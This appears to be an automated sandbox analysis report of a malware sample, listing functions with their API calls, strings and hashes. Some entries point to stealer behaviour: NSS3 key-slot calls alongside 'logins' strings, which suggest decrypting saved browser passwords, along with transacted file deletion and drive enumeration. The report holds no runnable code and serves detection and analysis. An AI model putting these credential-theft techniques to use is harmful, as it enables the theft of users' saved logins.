                                                                                                                                                    • Opcode ID: 8ac1834224050efea418e1a041ad6e33ee1a80b77f542beff2b1e74bf933d6de
                                                                                                                                                    • Instruction ID: 787300b2bcf11940abf80d0aa17043aaa8be166af9ae41d294091f6f8f5c0cda
                                                                                                                                                    • Opcode Fuzzy Hash: 8ac1834224050efea418e1a041ad6e33ee1a80b77f542beff2b1e74bf933d6de
                                                                                                                                                    • Instruction Fuzzy Hash: 5A42DD30E042689FDF25DBA4D890BDDBBB1AF55304F1080AED4497B252EB781F89CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042862C, Relevance: 9.3, APIs: 6, Instructions: 332fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00428631
                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 0042873A
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00428748
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00428786
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004287AF
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004287B6
                                                                                                                                                      • Part of subcall function 0040C9C5: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000010,00000000,?), ref: 0040C9D8
                                                                                                                                                      • Part of subcall function 0040C9C5: DeleteFileTransactedA.KERNEL32 ref: 0040C9EF
                                                                                                                                                      • Part of subcall function 0040C9C5: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000010,00000000,?,?,?,00417CF0,00000012,?,?), ref: 0040C9FA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 604483397-0
                                                                                                                                                    • Opcode ID: c5cb132ea6dcb72161e4d53da6abfea59dbf6d819666b7bd00c8722d97b9c442
                                                                                                                                                    • Instruction ID: 4caed70cc580c0fe00e8244e99d64614bbc9caa6cbb7e6ee67f5b4d7d0a0b409
                                                                                                                                                    • Opcode Fuzzy Hash: c5cb132ea6dcb72161e4d53da6abfea59dbf6d819666b7bd00c8722d97b9c442
                                                                                                                                                    • Instruction Fuzzy Hash: FAE1E030D012ACDBDB21DFA4D991BEEBB74AF15304F5080AEE44977242DB740B88CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041E52C, Relevance: 7.6, APIs: 5, Instructions: 144encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041E531
                                                                                                                                                    • _strlen.LIBCMT ref: 0041E5A0
                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,00001FA0,00000000,00000000), ref: 0041E5A8
                                                                                                                                                    • PK11_GetInternalKeySlot.NSS3(?,00000000,00000001,?,00001FA0,00000000,00000000,?,logins,logins), ref: 0041E5B6
                                                                                                                                                    • PK11_FreeSlot.NSS3(?,?,00001FA0,00000000,00000000,?,logins,logins), ref: 0041E693
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: K11_Slot$BinaryCryptFreeH_prologInternalString_strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1828113442-0
                                                                                                                                                    • Opcode ID: 96933380e63626170fb7b6f0f37c28da2cac1531c4a78e48b10d309d25107aa0
                                                                                                                                                    • Instruction ID: 5ac1bb6520e78d04e20f59fe1c19acc89c7b2549070ce5e988770c66ee5fef0c
                                                                                                                                                    • Opcode Fuzzy Hash: 96933380e63626170fb7b6f0f37c28da2cac1531c4a78e48b10d309d25107aa0
                                                                                                                                                    • Instruction Fuzzy Hash: 0D51F6B8D042599FDF15CFA698905FEBB79BF14304F84447FE805A3241DB388A46CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00434721, Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00434726
                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32 ref: 00434773
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeallocateDriveH_prologLogicalStrings
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3000204024-0
                                                                                                                                                    • Opcode ID: fb70408f250608ff4530b239f5f3261743df7803b28d1be11889e792f6425003
                                                                                                                                                    • Instruction ID: 04378b9e20afc82cafdd6e57550352d55c9a9a9668d4d7f69b57c48f043caabb
                                                                                                                                                    • Opcode Fuzzy Hash: fb70408f250608ff4530b239f5f3261743df7803b28d1be11889e792f6425003
                                                                                                                                                    • Instruction Fuzzy Hash: F121ACB1902249AFDB10DFA9C5407EEBFF5AF59308F14005EE495A3282D7B84A44CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045084A, Relevance: 3.0, APIs: 2, Instructions: 34timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00436357,00000000,?,?,?,?,?,?,?), ref: 0045085D
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045088E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1518329722-0
                                                                                                                                                    • Opcode ID: dae583111c26c27fd54102abe44ba92a1921629c5f24e0dbfe926bea321c8681
                                                                                                                                                    • Instruction ID: 7971912e505a3d3e64ed573d918b57398617437964ccc6e8691d9ef134ae2b9a
                                                                                                                                                    • Opcode Fuzzy Hash: dae583111c26c27fd54102abe44ba92a1921629c5f24e0dbfe926bea321c8681
                                                                                                                                                    • Instruction Fuzzy Hash: 70F02135510304BBDB14FF54C855F5D76E4EF40316F24465DA501D6141D674D54887C9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0044C1E6, Relevance: 2.7, Strings: 2, Instructions: 237COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0$A:\_Work\rc-build-v1-exe\json.hpp
                                                                                                                                                    • API String ID: 0-2332055066
                                                                                                                                                    • Opcode ID: b9ea059aaef3f3b958cd43ae10a9ed59c7ef0a0b87ab763b740485e56c18949d
                                                                                                                                                    • Instruction ID: e01201bc4bc0f041aa4e95d1dc375f82b67222ab1c88d109354c5ee856734e1b
                                                                                                                                                    • Opcode Fuzzy Hash: b9ea059aaef3f3b958cd43ae10a9ed59c7ef0a0b87ab763b740485e56c18949d
                                                                                                                                                    • Instruction Fuzzy Hash: 11616530B4220557FBA89FA984D27BF73A5BB46704F4C442FE842DB381D6ED9D46824E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045E752, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b0425d215f6d3c31911044a9dcbd211dbac56b8879f8f5ec4a8d4653d90ee51e
                                                                                                                                                    • Instruction ID: f704996b7132c50e79f53b6a4d691ad1ea8a28287df1a45557fc171858c59f93
                                                                                                                                                    • Opcode Fuzzy Hash: b0425d215f6d3c31911044a9dcbd211dbac56b8879f8f5ec4a8d4653d90ee51e
                                                                                                                                                    • Instruction Fuzzy Hash: 7A41C9B1C042186FDB24DF6ACC89AAEBBB8EF45304F1401DEE81CD3211D6359E448F54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0044C443, Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                    • Opcode ID: 8f4f240dc80eb7ab74758cbf0d43c2e0a69b22879c5bd87103e0f3c24262edd3
                                                                                                                                                    • Instruction ID: 0fe3a382c124cc9e09fedc3bd78b97dde97716471e548e2cbc34e9e853d79f66
                                                                                                                                                    • Opcode Fuzzy Hash: 8f4f240dc80eb7ab74758cbf0d43c2e0a69b22879c5bd87103e0f3c24262edd3
                                                                                                                                                    • Instruction Fuzzy Hash: 7A616670602214A6FFB89E2989E57BFA395AB41704F4C482FE443DB380DA7DED45834E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043C20A, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0b80c89bf06468f07e037445c45cb8c6e867a86bbf9bd64e22ebf593c221cd8c
                                                                                                                                                    • Instruction ID: 4c7514988f42416b68e8782f91c235c5d90f4176b7989f92821b644b6eb7a20e
                                                                                                                                                    • Opcode Fuzzy Hash: 0b80c89bf06468f07e037445c45cb8c6e867a86bbf9bd64e22ebf593c221cd8c
                                                                                                                                                    • Instruction Fuzzy Hash: CD2139719340B549870C4B7A6C61477BBE09B8B34338B42FBD99BE90C2C53DD564D7A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004606AB, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 004606EF
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FA66
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FA78
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FA8A
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FA9C
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FAAE
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FAC0
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FAD2
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FAE4
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FAF6
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FB08
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FB1A
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FB2C
                                                                                                                                                      • Part of subcall function 0045FA49: _free.LIBCMT ref: 0045FB3E
                                                                                                                                                    • _free.LIBCMT ref: 004606E4
                                                                                                                                                      • Part of subcall function 00456A53: RtlFreeHeap.NTDLL(00000000,00000000,?,0046019E,?,00000000,?,?,?,00460441,?,00000007,?,?,00460842,?), ref: 00456A69
                                                                                                                                                      • Part of subcall function 00456A53: GetLastError.KERNEL32(?,?,0046019E,?,00000000,?,?,?,00460441,?,00000007,?,?,00460842,?,?), ref: 00456A7B
                                                                                                                                                    • _free.LIBCMT ref: 00460706
                                                                                                                                                    • _free.LIBCMT ref: 0046071B
                                                                                                                                                    • _free.LIBCMT ref: 00460726
                                                                                                                                                    • _free.LIBCMT ref: 00460748
                                                                                                                                                    • _free.LIBCMT ref: 0046075B
                                                                                                                                                    • _free.LIBCMT ref: 00460769
                                                                                                                                                    • _free.LIBCMT ref: 00460774
                                                                                                                                                    • _free.LIBCMT ref: 004607AC
                                                                                                                                                    • _free.LIBCMT ref: 004607B3
                                                                                                                                                    • _free.LIBCMT ref: 004607D0
                                                                                                                                                    • _free.LIBCMT ref: 004607E8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                    • Opcode ID: 3e9e24a07d31f85a8184d20c515f98e07dd2d4e64a4c0cf6a4a38bc4b261a53d
                                                                                                                                                    • Instruction ID: 57df4c1e4e67bc7e0d172ef13ee851d5d81a7cdee128c1c738518d7730fc72b5
                                                                                                                                                    • Opcode Fuzzy Hash: 3e9e24a07d31f85a8184d20c515f98e07dd2d4e64a4c0cf6a4a38bc4b261a53d
                                                                                                                                                    • Instruction Fuzzy Hash: 6B31AF315003009FDB20EA39E845B57B3E5AF51356F11842FE458E7292EF78BD448B19
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043C46B, Relevance: 16.7, APIs: 11, Instructions: 184fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000001,?,00000001,?,00000000), ref: 0043C47F
                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0043C4FF
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0043C516
                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0043C529
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0043C536
                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0043C549
                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0043C56A
                                                                                                                                                    • ReadFile.KERNEL32(?,0043C96C,00000004,?,00000000), ref: 0043C57D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2979504256-0
                                                                                                                                                    • Opcode ID: 54a48746c54553facbbabd16b5f9f89204289cb9891a0e7a335fc1526425d64e
                                                                                                                                                    • Instruction ID: cccca3e656a7bceb94ead84b7ec31f89a5d7cb37ca5d416417e4f41158eb8422
                                                                                                                                                    • Opcode Fuzzy Hash: 54a48746c54553facbbabd16b5f9f89204289cb9891a0e7a335fc1526425d64e
                                                                                                                                                    • Instruction Fuzzy Hash: 535163B5A00218BFEB24DF65DC95BBF77B9EB48700F11442AF906E7280D674ED408794
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00442262, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 0044235F
                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00442381
                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00442490
                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 00442562
                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 004425E6
                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00442601
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                    • API String ID: 2123188842-393685449
                                                                                                                                                    • Opcode ID: c80e7a29873f79c293eb5bf7f8c6bb67cbb87d261254415a3db6badd4fbf78bf
                                                                                                                                                    • Instruction ID: 129828863feda2ebe7fa5091a581aa6c03b1e51ff698d51006a47f77d16a6b21
                                                                                                                                                    • Opcode Fuzzy Hash: c80e7a29873f79c293eb5bf7f8c6bb67cbb87d261254415a3db6badd4fbf78bf
                                                                                                                                                    • Instruction Fuzzy Hash: 01B18B71800209EFEF14DFA5CA819AEBBB5FF08314F94405BF8116B212D7B9DA51CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043C358, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strlen
                                                                                                                                                    • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                    • API String ID: 4218353326-51310709
                                                                                                                                                    • Opcode ID: ef91ed95dc45f9522bc7c721a7bfcb3eae32aaf3d42916dc1232f05272d8f718
                                                                                                                                                    • Instruction ID: 2b2c30693691db5b42727df60637067f5d05407030801618b1ff3a9d42202410
                                                                                                                                                    • Opcode Fuzzy Hash: ef91ed95dc45f9522bc7c721a7bfcb3eae32aaf3d42916dc1232f05272d8f718
                                                                                                                                                    • Instruction Fuzzy Hash: 9F11A71A289B22257525212E6C927BB83888E7AB34B35D00FF840B01C7FF4CD48742EE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045487C, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 255COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00455C41: GetLastError.KERNEL32(?,?,?,0045103B,00482B30,00000008,0043DAAF,?,00414A08,?,7FFFFFFF,?,00000000,00000000), ref: 00455C46
                                                                                                                                                      • Part of subcall function 00455C41: SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,?,0045103B,00482B30,00000008,0043DAAF,?,00414A08,?,7FFFFFFF,?,00000000), ref: 00455CE4
                                                                                                                                                    • _free.LIBCMT ref: 00454B67
                                                                                                                                                    • _free.LIBCMT ref: 00454B80
                                                                                                                                                    • _free.LIBCMT ref: 00454BBE
                                                                                                                                                    • _free.LIBCMT ref: 00454BC7
                                                                                                                                                    • _free.LIBCMT ref: 00454BD3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorLast
                                                                                                                                                    • String ID: ;E$C
                                                                                                                                                    • API String ID: 3291180501-2222216299
                                                                                                                                                    • Opcode ID: 15b6ca70b14ac97cee8ef971a107c3e5b96a2f6456d297a6c8d3155fb0a07de5
                                                                                                                                                    • Instruction ID: 0501fc559335f2fdadebbc87e82dfe016825880f637fb96df543660f7e46955f
                                                                                                                                                    • Opcode Fuzzy Hash: 15b6ca70b14ac97cee8ef971a107c3e5b96a2f6456d297a6c8d3155fb0a07de5
                                                                                                                                                    • Instruction Fuzzy Hash: E7B16E759012199BDB24DF14C884BAAB3B4FF48309F5085AEE849A7352E734AED4CF44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004543F1, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004587A6: RtlAllocateHeap.NTDLL(00000000,?,?,?,0043FE6B,?,?,00000000,?,?,0040A242,?,?,?,?,0040A2DA), ref: 004587D8
                                                                                                                                                    • _free.LIBCMT ref: 00454500
                                                                                                                                                    • _free.LIBCMT ref: 00454517
                                                                                                                                                    • _free.LIBCMT ref: 00454534
                                                                                                                                                    • _free.LIBCMT ref: 0045454F
                                                                                                                                                    • _free.LIBCMT ref: 00454566
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$AllocateHeap
                                                                                                                                                    • String ID: ;E
                                                                                                                                                    • API String ID: 3033488037-3398744250
                                                                                                                                                    • Opcode ID: d7818d0e9593ee08a09179adc074e714b46081d3e6dc769422dec0a5bf8a9da2
                                                                                                                                                    • Instruction ID: 60bfad4a06b185af6a91731bdd1fab43608a5f775f48a66fd8afe70fd9c204ef
                                                                                                                                                    • Opcode Fuzzy Hash: d7818d0e9593ee08a09179adc074e714b46081d3e6dc769422dec0a5bf8a9da2
                                                                                                                                                    • Instruction Fuzzy Hash: 3351F431A00204AFDB10DF2AD841B6A73F4EF85329B14456FED05DB252E738DA49CB48
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00460428, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00460174: _free.LIBCMT ref: 00460199
                                                                                                                                                    • _free.LIBCMT ref: 00460476
                                                                                                                                                      • Part of subcall function 00456A53: RtlFreeHeap.NTDLL(00000000,00000000,?,0046019E,?,00000000,?,?,?,00460441,?,00000007,?,?,00460842,?), ref: 00456A69
                                                                                                                                                      • Part of subcall function 00456A53: GetLastError.KERNEL32(?,?,0046019E,?,00000000,?,?,?,00460441,?,00000007,?,?,00460842,?,?), ref: 00456A7B
                                                                                                                                                    • _free.LIBCMT ref: 00460481
                                                                                                                                                    • _free.LIBCMT ref: 0046048C
                                                                                                                                                    • _free.LIBCMT ref: 004604E0
                                                                                                                                                    • _free.LIBCMT ref: 004604EB
                                                                                                                                                    • _free.LIBCMT ref: 004604F6
                                                                                                                                                    • _free.LIBCMT ref: 00460501
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 5b7e7a1955ec7dc9ea8f329336d175e012a513589e973e55988bf1c9b0e44123
                                                                                                                                                    • Instruction ID: bc90d3fc723fe93881243bb3d01aa240d7e4a80dc5b088d46792cd6e1bc382fe
                                                                                                                                                    • Opcode Fuzzy Hash: 5b7e7a1955ec7dc9ea8f329336d175e012a513589e973e55988bf1c9b0e44123
                                                                                                                                                    • Instruction Fuzzy Hash: 9F117271540704BBDA20F772DC07FCBB7DD9F42708F40891EB69966052E73AB9088695
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045600C, Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(?,00444EE1,900C408B), ref: 00456054
                                                                                                                                                    • __fassign.LIBCMT ref: 00456239
                                                                                                                                                    • __fassign.LIBCMT ref: 00456256
                                                                                                                                                    • WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0045629E
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004562DE
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00456386
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1735259414-0
                                                                                                                                                    • Opcode ID: 49156975580a9520d4602ac71e3b3875838934878e6cea4594403ccc3dffe7c1
                                                                                                                                                    • Instruction ID: b2c9b442a66be2216038eab9ef6e37d7cae0f82e44c2b4b3f18ddc1d0ce17734
                                                                                                                                                    • Opcode Fuzzy Hash: 49156975580a9520d4602ac71e3b3875838934878e6cea4594403ccc3dffe7c1
                                                                                                                                                    • Instruction Fuzzy Hash: 78C19971D012589FDB10CFA8C8809EDBBB5AF48304F69416AEC55FB342D6359E4ACF68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00428337, Relevance: 9.2, APIs: 6, Instructions: 236fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0042833C
                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 00428447
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00428456
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0042849D
                                                                                                                                                    • ReadFile.KERNEL32(00000010,00000000,00000000,?,00000000), ref: 004284C8
                                                                                                                                                    • CloseHandle.KERNEL32(00000010), ref: 004284CF
                                                                                                                                                      • Part of subcall function 0040C9C5: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000010,00000000,?), ref: 0040C9D8
                                                                                                                                                      • Part of subcall function 0040C9C5: DeleteFileTransactedA.KERNEL32 ref: 0040C9EF
                                                                                                                                                      • Part of subcall function 0040C9C5: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000010,00000000,?,?,?,00417CF0,00000012,?,?), ref: 0040C9FA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 604483397-0
                                                                                                                                                    • Opcode ID: 5226308d322344e5103f62b7dc464f24d51d2708b6a5eeb231df598512c6140c
                                                                                                                                                    • Instruction ID: 8eeb67bff763fcb70bbdbc5e2afb919394c74dabad346f7540e95aa938874fb2
                                                                                                                                                    • Opcode Fuzzy Hash: 5226308d322344e5103f62b7dc464f24d51d2708b6a5eeb231df598512c6140c
                                                                                                                                                    • Instruction Fuzzy Hash: 6891EF31D012589FCF10EFE5D8916EEBBB4AF55304F5080AEE445A7252EF381B88CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004522D7, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 375COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
